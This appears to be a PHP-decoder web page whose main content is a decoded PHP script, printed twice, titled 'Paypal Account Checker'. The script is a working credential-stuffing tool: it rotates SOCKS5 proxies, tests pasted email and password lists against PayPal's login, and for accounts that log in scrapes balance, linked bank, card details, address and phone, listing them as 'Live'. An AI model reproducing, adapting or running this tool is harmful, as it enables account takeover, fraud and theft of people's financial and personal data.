Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<? error_reporting(0); ?> <?php xflush(); ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML..
Decoded Output download
<?
error_reporting(0);
?>
<?php xflush(); ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">
<head>
<!-- no cache headers -->
<!-- end no cache headers -->
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Paypal Account Checker</title>
<style>
body{
background:#ddd;
padding:5px;
margin:5px;
font-family:Tahoma;
font-size:13px;
color:#0F0317;
}
textarea,input,select
{
padding: 5px;
background:#ddf8cc;
color:darkgreen;
border:solid gray;
}
input
{
text-align:center;
}
</style>
</head>
<body><center><h1> Paypal Account Checker </h1></center><br>
<form method="post">
<div align="center"><textarea name="mp" cols="50" rows="10"><?php if($_POST['btn-submit']) echo $_POST['mp']; else echo '1596|cpaninh-trymto.com|lamdeogicopass';?></textarea><textarea name="socks" cols="30" rows="10"><?php if($_POST['btn-submit']) echo implode("
",array_unique(get($_POST['socks'])));?>o la la sock</textarea><br />
Delim: <input type="text" name="delim" value="<?php if($_POST['btn-submit']) echo $_POST['delim']; else echo ':';?>" size="1" /> Email: <input type="text" name="mail" value="<?php if($_POST['btn-submit']) echo $_POST['mail']; else echo 1;?>" size="1" /> Password: <input type="text" name="pwd" value="<?php if($_POST['btn-submit']) echo $_POST['pwd']; else echo 2;?>" size="1" />
<input type="checkbox" name="bank" checked="checked" value="1" />Check Bank <input type="checkbox" name="card" checked="checked" value="1" />Check Card <input type="checkbox" name="info" checked="checked" value="1" />Get Address/Phone<br />
<input type="submit" value=" Submit " name="btn-submit" />
</div>
</form>
<?php
set_time_limit(0);
function curl($url='',$var=''){
global $config,$sock;
$curl = curl_init();
if ($sock) {
curl_setopt($curl, CURLOPT_HTTPPROXYTUNNEL, true);
curl_setopt($curl, CURLOPT_PROXY, $sock);
curl_setopt($curl, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);
}
curl_setopt($curl, CURLOPT_URL, $url);
curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 10);
curl_setopt($curl, CURLOPT_USERAGENT, $config['useragent']);
curl_setopt($curl, CURLOPT_REFERER, "https://www.paypal.com/");
if($var) {
curl_setopt($curl, CURLOPT_POST, true);
curl_setopt($curl, CURLOPT_POSTFIELDS, $var);
}
curl_setopt($curl, CURLOPT_COOKIEFILE,$config['cookie_file']);
curl_setopt($curl, CURLOPT_COOKIEJAR,$config['cookie_file']);
curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 2);
curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
$result = curl_exec($curl);
curl_close($curl);
return $result;
}
function fetch_value($str,$find_start,$find_end)
{
$start = stripos($str, $find_start);
if($start===false) return "";
$length = strlen($find_start);
$end = stripos(substr($str, $start+$length), $find_end);
return trim(substr($str, $start+$length, $end));
}
$config['useragent'] = 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.18) Gecko/20110619 Firefox/3.6.18 (Palemoon/3.6.18)'; /// Iphone 2.21
################# RE-CONFIG ################
$dir = dirname(__FILE__);
$config['cookie_file'] = $dir . '/cookies/'. md5($_SERVER['REMOTE_ADDR']) . '.txt';
if(!file_exists($config['cookie_file'])){
$fp = @fopen($config['cookie_file'],'w');
@fclose($fp);
}
#########################################
################# FUNCTION ################
$zzz = "";
$live = array();
function get($list)
{
preg_match_all("/\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}/", $list, $socks);
return $socks[0];
}
function delete_cookies(){
global $config;
$fp = @fopen($config['cookie_file'],'w');
@fclose($fp);
}
function xflush()
{
static $output_handler = null;
if ($output_handler === null)
{
$output_handler = @ini_get('output_handler');
}
if ($output_handler == 'ob_gzhandler')
{
// forcing a flush with this is very bad
return;
}
flush();
if (function_exists('ob_flush') AND function_exists('ob_get_length') AND ob_get_length() !== false)
{
@ob_flush();
}
else if (function_exists('ob_end_flush') AND function_exists('ob_start') AND function_exists('ob_get_length') AND ob_get_length() !== FALSE)
{
@ob_end_flush();
@ob_start();
}
}
function isSockClear(){
global $sock;
$str = curl("https://www.paypal.com/xclick/business=paypal%40dreamhost.com&rm=2&item_name=Web +Hosting+Donation&item_number=donation_13185&amoun t=10&image_url=https%3A//secure.newdream.net/dreamhostpp.gif&no_shipping=1&no_note=1&return=htt p%3A//www.dreamhost.com/donate.cgi&cancel_return=&tax=0¤cy_code=USD" );
if(!$str)
return -1;
if(stripos($str,'password')!==false)
return 0;
return 1;
}
function display($str){
echo "<div>$str</div>";
}
function infoCard() {
global $config,$sock;
$response = curl("https://www.paypal.com/us/cgi-bin/webscr?cmd=_profile-credit-card-new-clickthru&flag_from_account_summary=1&nav=0.5.2");
//echo ' -> Fetching Card';xflush();
$checkcard = fetch_value($response,'s.prop1="','"');
if(stripos($checkcard,'ccadd')!==false)
return false;
preg_match_all('/<tr>(.+)<\/tr>/siU', $response, $matches);
$cc = array();
foreach($matches[1] AS $k => $v){
if($k>0){
preg_match_all('/<td>(.+)<\/td>/siU', $v, $m);
$type = fetch_value($m[1][0],'alt="','"');
$ccnum = $m[1][1];
$exp = $m[1][2];
$cc[] = "$type [$ccnum $exp]";
}
}
$infocard = "<font color=\"#EDAD39\">" . implode("-", $cc) . "</font>";
return $infocard;
}
function infoBank(){
global $config,$sock;
$response = curl("https://www.paypal.com/us/cgi-bin/webscr?cmd=_profile-ach&nav=0.5.1");
//echo ' -> Fetching Bank';xflush();
if(stripos($response,'ach_id')!==false)
return true;
return false;
}
function info(){
global $config,$sock;
$response = curl("https://www.paypal.com/us/cgi-bin/webscr?cmd=_profile-address&nav=0.6.3");
//echo ' -> Fetching Information';xflush();
$info = str_replace("<br>",", ",fetch_value($response,'emphasis">','</span>'));
return substr($info,0,-2);
}
function infoPhone(){
global $config,$sock;
$response = curl("https://www.paypal.com/us/cgi-bin/webscr?cmd=_profile-phone&nav=0.6.4");
//echo ' -> Fetching Phone';xflush();
$info = strip_tags('<input type="hidden" '. fetch_value($response,'name="phone"','</label>'));
return $info;
}
if($_POST['btn-submit']){
xflush();
$socks = array_unique(get($_POST['socks']));
$emails = explode("
",trim($_POST['mp']));
$sCount = count($socks);
$eCount = count($emails);
$failed = $live = $uncheck = array();
$checked = 0;
foreach($socks AS $sock){
if(!count($emails)) break;
delete_cookies();
$sockClear = isSockClear();
if($sockClear==-1){
display('[<font color="#FF0000">' . $sock . ' => Timeout/Die</font>]');
}
elseif($sockClear==0){
display('[<font color="#FF0000">' . $sock . ' => Blacklist</font>]');
}
xflush();
if($sockClear!=1) continue;
display('[<font color="#00FF00">' . $sock . ' => OK</font>]');
xflush();
$failed[$sock] = 0;
foreach($emails AS $k => $line){
$info = explode($_POST['delim'],$line);
$email = trim($info["{$_POST['mail']}"]);
$pwd = trim($info["{$_POST['pwd']}"]);
if(stripos($email,'@')===false || strlen($pwd)<8){
unset($emails[$k]);
display($email . ' | ' . $pwd . ' -> Wrong Mail/Pass Paypal Format');
xflush();
continue;
}
if($failed[$sock] > 5) break;
delete_cookies();
if(!curl("https://www.paypal.com/")){
display('[<font color="#FF0000">' . $sock . ' => Timeout/Die</font>]');
xflush();
break;
}
$var = "login_email=" . urlencode($email) . "&login_password=" . urlencode($pwd) . "&target_page=0&submit.x=Log+In&form_charset=U TF-8&bp_mid=v%3D1%3Ba1%3Dna%7Ea2%3Dna%7Ea3%3Dna%7Ea4% 3DMozilla%7Ea5%3DNetscape%7Ea6%3D5.0+%28Windows%3B +en-US%29%7Ea7%3D20110619%7Ea8%3Dna%7Ea9%3Dtrue%7Ea10% 3DWindows+NT+6.1%7Ea11%3Dtrue%7Ea12%3DWin32%7Ea13% 3Dna%7Ea14%3DMozilla%2F5.0+%28Windows%3B+U%3B+Wind ows+NT+6.1%3B+en-US%3B+rv%3A1.9.2.18%29+Gecko%2F20110619+Firefox%2F 3.6.18+%28Palemoon%2F3.6.18%29%7Ea15%3Dtrue%7Ea16% 3Den-US%7Ea17%3Dna%7Ea18%3Dwww.paypal.com%7Ea19%3Dna%7E a20%3Dna%7Ea21%3Dna%7Ea22%3Dna%7Ea23%3D1280%7Ea24% 3D800%7Ea25%3D24%7Ea26%3D770%7Ea27%3Dna%7Ea28%3DTu e+Nov+22+2011+19%3A23%3A55+GMT%2B0700+%28SE+Asia+S tandard+Time%29%7Ea29%3D7%7Ea30%3Ddef%7Cqt1%7Cqt2% 7Cqt3%7Cqt4%7Cqt5%7Cqt6%7Cswf%7Crpl%7Crpv%7C%7Ea31 %3Dyes%7Ea32%3Dna%7Ea33%3Dna%7Ea34%3Dno%7Ea35%3Dno %7Ea36%3Dyes%7Ea37%3Dno%7Ea38%3Donline%7Ea39%3Dno% 7Ea40%3DWindows+NT+6.1%7Ea41%3Dno%7Ea42%3Dno%7E&bp _ks1=v%3D1%3Bl%3D8%3BDi0%3A68417Ui0%3A82Di1%3A71Di 2%3A70Ui1%3A15Ui2%3A70Di3%3A105Ui3%3A60Di4%3A70Ui4 %3A60Di5%3A103Ui5%3A67Di6%3A329Ui6%3A114Di7%3A66Ui 7%3A94&bp_ks2=&bp_ks3=&browser_name=Firefox&browse r_version=undefined&browser_version_full=3.6.18&op erating_system=Windows&flow_name=xpt%2FMarketing_C ommandDriven%2Fhomepage%2FMainHome&fso_enabled=11" ;
$s = curl("https://www.paypal.com/cgi-bin/webscr?cmd=_login-submit&dispatch=5885d80a13c0db1f8e263663d3faee8db2 b24f7b84f1819343fd6c338b1d9d60", $var);
if(!$s){
display('[<font color="#FF0000">' . $sock . ' => Timeout/Die</font>]');
xflush();
break;
}
if(stripos($s,'security challenge')!==false){
display('[<font color="#FF0000">' . $sock . ' => Bad sock</font>]');
xflush();
break;
}
$checked++;
$error = fetch_value($s,'s.prop14="','"');
if($error = fetch_value($s,'s.prop14="','"')){
unset($emails[$k]);
display("<b style='color:red'>Die</b> => $sock | $email | $pwd");
$failed[$sock]++;
xflush();
continue;
}
$loggedIn = curl("https://www.paypal.com/us/cgi-bin/webscr?cmd=_account&nav=0.0");
if(!$loggedIn){
display('[<font color="#FF0000">' . $sock . ' => Timeout/Die</font>]');
unset($emails[$k]);
array_push($emails, $line);
xflush();
break;
}
if(stripos($loggedIn,'class="balance">')!==false){
$loggedIn = preg_replace('/<!--google(off|on): all-->/si','',$loggedIn);
$loggedIn = preg_replace('/
+/si','',$loggedIn);
$pp = array();
$pp['type'] = fetch_value($loggedIn,'s.prop7="','"');
$pp['type'] = '<span class="' . $pp['type'] . '">' . ucfirst($pp['type']) . '</span>';
$pp['status'] = fetch_value($loggedIn,'s.prop8="','"');
$pp['status'] = '<span class="' . $pp['status'] . '">' . ucfirst($pp['status']) . '</span>';
if(fetch_value($loggedIn,'s.prop9="','"')!='unrest ricted')
$pp['limited'] = '<font color="red">Limited</font>';
$pp['bl'] = fetch_value($loggedIn,'<span class="balance">','</span>');
if($pp['bl']){
if(stripos($pp['bl'],'strong')!==false)
$pp['bl'] = trim(fetch_value($pp['bl'],'<strong>','</strong>'));
}
else
$pp['bl'] = fetch_value($loggedIn,'<span class="balance negative">','</span>');
if(!$pp['limited']){
if($_POST['bank'])
$pp['bank'] = infoBank() ? "Have Bank" : "No Bank";
if($_POST['card']){
$card = infoCard();
$card = ($card) ? $card : "No Card";
$pp['card'] = $card;
}
if($_POST['info']){
$pp['address'] = info();
$pp['phone'] = infoPhone();
}
}
$pp['lastloggin'] = strip_tags(fetch_value($loggedIn,'<div class="small secondary">','</div>'));
$xyz = "<b style='color:yellow'>Live</b> => $sock | $email | $pwd | " . implode(" | ",$pp);
$live[] = $xyz;
unset($emails[$k]);
display($xyz);
xflush();
}
else{
$title = fetch_value($s,'title>','</title>');
display("<b style='color:red'>Bad Account</b> => $sock | $email | $pwd | $title");
unset($emails[$k]);
xflush();
}
xflush();
break;
}
}
display("<h3>Total: $eCount - Checked: $checked - Live: " . count($live) . "</h5>");
display(implode("<br />",$live));
if(count($emails)){
display("Uncheck:");
display(implode("<br />",$emails));
}
}
?>
</body>
</html>
Did this file decode correctly?
Original Code
<?
error_reporting(0);
?>
<?php xflush(); ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">
<head>
<!-- no cache headers -->
<!-- end no cache headers -->
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Paypal Account Checker</title>
<style>
body{
background:#ddd;
padding:5px;
margin:5px;
font-family:Tahoma;
font-size:13px;
color:#0F0317;
}
textarea,input,select
{
padding: 5px;
background:#ddf8cc;
color:darkgreen;
border:solid gray;
}
input
{
text-align:center;
}
</style>
</head>
<body><center><h1> Paypal Account Checker </h1></center><br>
<form method="post">
<div align="center"><textarea name="mp" cols="50" rows="10"><?php if($_POST['btn-submit']) echo $_POST['mp']; else echo '1596|cpaninh-trymto.com|lamdeogicopass';?></textarea><textarea name="socks" cols="30" rows="10"><?php if($_POST['btn-submit']) echo implode("\n",array_unique(get($_POST['socks'])));?>o la la sock</textarea><br />
Delim: <input type="text" name="delim" value="<?php if($_POST['btn-submit']) echo $_POST['delim']; else echo ':';?>" size="1" /> Email: <input type="text" name="mail" value="<?php if($_POST['btn-submit']) echo $_POST['mail']; else echo 1;?>" size="1" /> Password: <input type="text" name="pwd" value="<?php if($_POST['btn-submit']) echo $_POST['pwd']; else echo 2;?>" size="1" />
<input type="checkbox" name="bank" checked="checked" value="1" />Check Bank <input type="checkbox" name="card" checked="checked" value="1" />Check Card <input type="checkbox" name="info" checked="checked" value="1" />Get Address/Phone<br />
<input type="submit" value=" Submit " name="btn-submit" />
</div>
</form>
<?php
set_time_limit(0);
function curl($url='',$var=''){
global $config,$sock;
$curl = curl_init();
if ($sock) {
curl_setopt($curl, CURLOPT_HTTPPROXYTUNNEL, true);
curl_setopt($curl, CURLOPT_PROXY, $sock);
curl_setopt($curl, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);
}
curl_setopt($curl, CURLOPT_URL, $url);
curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 10);
curl_setopt($curl, CURLOPT_USERAGENT, $config['useragent']);
curl_setopt($curl, CURLOPT_REFERER, "https://www.paypal.com/");
if($var) {
curl_setopt($curl, CURLOPT_POST, true);
curl_setopt($curl, CURLOPT_POSTFIELDS, $var);
}
curl_setopt($curl, CURLOPT_COOKIEFILE,$config['cookie_file']);
curl_setopt($curl, CURLOPT_COOKIEJAR,$config['cookie_file']);
curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 2);
curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
$result = curl_exec($curl);
curl_close($curl);
return $result;
}
function fetch_value($str,$find_start,$find_end)
{
$start = stripos($str, $find_start);
if($start===false) return "";
$length = strlen($find_start);
$end = stripos(substr($str, $start+$length), $find_end);
return trim(substr($str, $start+$length, $end));
}
$config['useragent'] = 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.18) Gecko/20110619 Firefox/3.6.18 (Palemoon/3.6.18)'; /// Iphone 2.21
################# RE-CONFIG ################
$dir = dirname(__FILE__);
$config['cookie_file'] = $dir . '/cookies/'. md5($_SERVER['REMOTE_ADDR']) . '.txt';
if(!file_exists($config['cookie_file'])){
$fp = @fopen($config['cookie_file'],'w');
@fclose($fp);
}
#########################################
################# FUNCTION ################
$zzz = "";
$live = array();
function get($list)
{
preg_match_all("/\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}/", $list, $socks);
return $socks[0];
}
function delete_cookies(){
global $config;
$fp = @fopen($config['cookie_file'],'w');
@fclose($fp);
}
function xflush()
{
static $output_handler = null;
if ($output_handler === null)
{
$output_handler = @ini_get('output_handler');
}
if ($output_handler == 'ob_gzhandler')
{
// forcing a flush with this is very bad
return;
}
flush();
if (function_exists('ob_flush') AND function_exists('ob_get_length') AND ob_get_length() !== false)
{
@ob_flush();
}
else if (function_exists('ob_end_flush') AND function_exists('ob_start') AND function_exists('ob_get_length') AND ob_get_length() !== FALSE)
{
@ob_end_flush();
@ob_start();
}
}
function isSockClear(){
global $sock;
$str = curl("https://www.paypal.com/xclick/business=paypal%40dreamhost.com&rm=2&item_name=Web +Hosting+Donation&item_number=donation_13185&amoun t=10&image_url=https%3A//secure.newdream.net/dreamhostpp.gif&no_shipping=1&no_note=1&return=htt p%3A//www.dreamhost.com/donate.cgi&cancel_return=&tax=0¤cy_code=USD" );
if(!$str)
return -1;
if(stripos($str,'password')!==false)
return 0;
return 1;
}
function display($str){
echo "<div>$str</div>";
}
function infoCard() {
global $config,$sock;
$response = curl("https://www.paypal.com/us/cgi-bin/webscr?cmd=_profile-credit-card-new-clickthru&flag_from_account_summary=1&nav=0.5.2");
//echo ' -> Fetching Card';xflush();
$checkcard = fetch_value($response,'s.prop1="','"');
if(stripos($checkcard,'ccadd')!==false)
return false;
preg_match_all('/<tr>(.+)<\/tr>/siU', $response, $matches);
$cc = array();
foreach($matches[1] AS $k => $v){
if($k>0){
preg_match_all('/<td>(.+)<\/td>/siU', $v, $m);
$type = fetch_value($m[1][0],'alt="','"');
$ccnum = $m[1][1];
$exp = $m[1][2];
$cc[] = "$type [$ccnum $exp]";
}
}
$infocard = "<font color=\"#EDAD39\">" . implode("-", $cc) . "</font>";
return $infocard;
}
function infoBank(){
global $config,$sock;
$response = curl("https://www.paypal.com/us/cgi-bin/webscr?cmd=_profile-ach&nav=0.5.1");
//echo ' -> Fetching Bank';xflush();
if(stripos($response,'ach_id')!==false)
return true;
return false;
}
function info(){
global $config,$sock;
$response = curl("https://www.paypal.com/us/cgi-bin/webscr?cmd=_profile-address&nav=0.6.3");
//echo ' -> Fetching Information';xflush();
$info = str_replace("<br>",", ",fetch_value($response,'emphasis">','</span>'));
return substr($info,0,-2);
}
function infoPhone(){
global $config,$sock;
$response = curl("https://www.paypal.com/us/cgi-bin/webscr?cmd=_profile-phone&nav=0.6.4");
//echo ' -> Fetching Phone';xflush();
$info = strip_tags('<input type="hidden" '. fetch_value($response,'name="phone"','</label>'));
return $info;
}
if($_POST['btn-submit']){
xflush();
$socks = array_unique(get($_POST['socks']));
$emails = explode("\n",trim($_POST['mp']));
$sCount = count($socks);
$eCount = count($emails);
$failed = $live = $uncheck = array();
$checked = 0;
foreach($socks AS $sock){
if(!count($emails)) break;
delete_cookies();
$sockClear = isSockClear();
if($sockClear==-1){
display('[<font color="#FF0000">' . $sock . ' => Timeout/Die</font>]');
}
elseif($sockClear==0){
display('[<font color="#FF0000">' . $sock . ' => Blacklist</font>]');
}
xflush();
if($sockClear!=1) continue;
display('[<font color="#00FF00">' . $sock . ' => OK</font>]');
xflush();
$failed[$sock] = 0;
foreach($emails AS $k => $line){
$info = explode($_POST['delim'],$line);
$email = trim($info["{$_POST['mail']}"]);
$pwd = trim($info["{$_POST['pwd']}"]);
if(stripos($email,'@')===false || strlen($pwd)<8){
unset($emails[$k]);
display($email . ' | ' . $pwd . ' -> Wrong Mail/Pass Paypal Format');
xflush();
continue;
}
if($failed[$sock] > 5) break;
delete_cookies();
if(!curl("https://www.paypal.com/")){
display('[<font color="#FF0000">' . $sock . ' => Timeout/Die</font>]');
xflush();
break;
}
$var = "login_email=" . urlencode($email) . "&login_password=" . urlencode($pwd) . "&target_page=0&submit.x=Log+In&form_charset=U TF-8&bp_mid=v%3D1%3Ba1%3Dna%7Ea2%3Dna%7Ea3%3Dna%7Ea4% 3DMozilla%7Ea5%3DNetscape%7Ea6%3D5.0+%28Windows%3B +en-US%29%7Ea7%3D20110619%7Ea8%3Dna%7Ea9%3Dtrue%7Ea10% 3DWindows+NT+6.1%7Ea11%3Dtrue%7Ea12%3DWin32%7Ea13% 3Dna%7Ea14%3DMozilla%2F5.0+%28Windows%3B+U%3B+Wind ows+NT+6.1%3B+en-US%3B+rv%3A1.9.2.18%29+Gecko%2F20110619+Firefox%2F 3.6.18+%28Palemoon%2F3.6.18%29%7Ea15%3Dtrue%7Ea16% 3Den-US%7Ea17%3Dna%7Ea18%3Dwww.paypal.com%7Ea19%3Dna%7E a20%3Dna%7Ea21%3Dna%7Ea22%3Dna%7Ea23%3D1280%7Ea24% 3D800%7Ea25%3D24%7Ea26%3D770%7Ea27%3Dna%7Ea28%3DTu e+Nov+22+2011+19%3A23%3A55+GMT%2B0700+%28SE+Asia+S tandard+Time%29%7Ea29%3D7%7Ea30%3Ddef%7Cqt1%7Cqt2% 7Cqt3%7Cqt4%7Cqt5%7Cqt6%7Cswf%7Crpl%7Crpv%7C%7Ea31 %3Dyes%7Ea32%3Dna%7Ea33%3Dna%7Ea34%3Dno%7Ea35%3Dno %7Ea36%3Dyes%7Ea37%3Dno%7Ea38%3Donline%7Ea39%3Dno% 7Ea40%3DWindows+NT+6.1%7Ea41%3Dno%7Ea42%3Dno%7E&bp _ks1=v%3D1%3Bl%3D8%3BDi0%3A68417Ui0%3A82Di1%3A71Di 2%3A70Ui1%3A15Ui2%3A70Di3%3A105Ui3%3A60Di4%3A70Ui4 %3A60Di5%3A103Ui5%3A67Di6%3A329Ui6%3A114Di7%3A66Ui 7%3A94&bp_ks2=&bp_ks3=&browser_name=Firefox&browse r_version=undefined&browser_version_full=3.6.18&op erating_system=Windows&flow_name=xpt%2FMarketing_C ommandDriven%2Fhomepage%2FMainHome&fso_enabled=11" ;
$s = curl("https://www.paypal.com/cgi-bin/webscr?cmd=_login-submit&dispatch=5885d80a13c0db1f8e263663d3faee8db2 b24f7b84f1819343fd6c338b1d9d60", $var);
if(!$s){
display('[<font color="#FF0000">' . $sock . ' => Timeout/Die</font>]');
xflush();
break;
}
if(stripos($s,'security challenge')!==false){
display('[<font color="#FF0000">' . $sock . ' => Bad sock</font>]');
xflush();
break;
}
$checked++;
$error = fetch_value($s,'s.prop14="','"');
if($error = fetch_value($s,'s.prop14="','"')){
unset($emails[$k]);
display("<b style='color:red'>Die</b> => $sock | $email | $pwd");
$failed[$sock]++;
xflush();
continue;
}
$loggedIn = curl("https://www.paypal.com/us/cgi-bin/webscr?cmd=_account&nav=0.0");
if(!$loggedIn){
display('[<font color="#FF0000">' . $sock . ' => Timeout/Die</font>]');
unset($emails[$k]);
array_push($emails, $line);
xflush();
break;
}
if(stripos($loggedIn,'class="balance">')!==false){
$loggedIn = preg_replace('/<!--google(off|on): all-->/si','',$loggedIn);
$loggedIn = preg_replace('/\n+/si','',$loggedIn);
$pp = array();
$pp['type'] = fetch_value($loggedIn,'s.prop7="','"');
$pp['type'] = '<span class="' . $pp['type'] . '">' . ucfirst($pp['type']) . '</span>';
$pp['status'] = fetch_value($loggedIn,'s.prop8="','"');
$pp['status'] = '<span class="' . $pp['status'] . '">' . ucfirst($pp['status']) . '</span>';
if(fetch_value($loggedIn,'s.prop9="','"')!='unrest ricted')
$pp['limited'] = '<font color="red">Limited</font>';
$pp['bl'] = fetch_value($loggedIn,'<span class="balance">','</span>');
if($pp['bl']){
if(stripos($pp['bl'],'strong')!==false)
$pp['bl'] = trim(fetch_value($pp['bl'],'<strong>','</strong>'));
}
else
$pp['bl'] = fetch_value($loggedIn,'<span class="balance negative">','</span>');
if(!$pp['limited']){
if($_POST['bank'])
$pp['bank'] = infoBank() ? "Have Bank" : "No Bank";
if($_POST['card']){
$card = infoCard();
$card = ($card) ? $card : "No Card";
$pp['card'] = $card;
}
if($_POST['info']){
$pp['address'] = info();
$pp['phone'] = infoPhone();
}
}
$pp['lastloggin'] = strip_tags(fetch_value($loggedIn,'<div class="small secondary">','</div>'));
$xyz = "<b style='color:yellow'>Live</b> => $sock | $email | $pwd | " . implode(" | ",$pp);
$live[] = $xyz;
unset($emails[$k]);
display($xyz);
xflush();
}
else{
$title = fetch_value($s,'title>','</title>');
display("<b style='color:red'>Bad Account</b> => $sock | $email | $pwd | $title");
unset($emails[$k]);
xflush();
}
xflush();
break;
}
}
display("<h3>Total: $eCount - Checked: $checked - Live: " . count($live) . "</h5>");
display(implode("<br />",$live));
if(count($emails)){
display("Uncheck:");
display(implode("<br />",$emails));
}
}
?>
</body>
</html>
Function Calls
| xflush | 1 |
| error_reporting | 1 |
Stats
| MD5 | e6d726dbada2aeb38abeec0cc00c9b78 |
| Eval Count | 0 |
| Decode Time | 144 ms |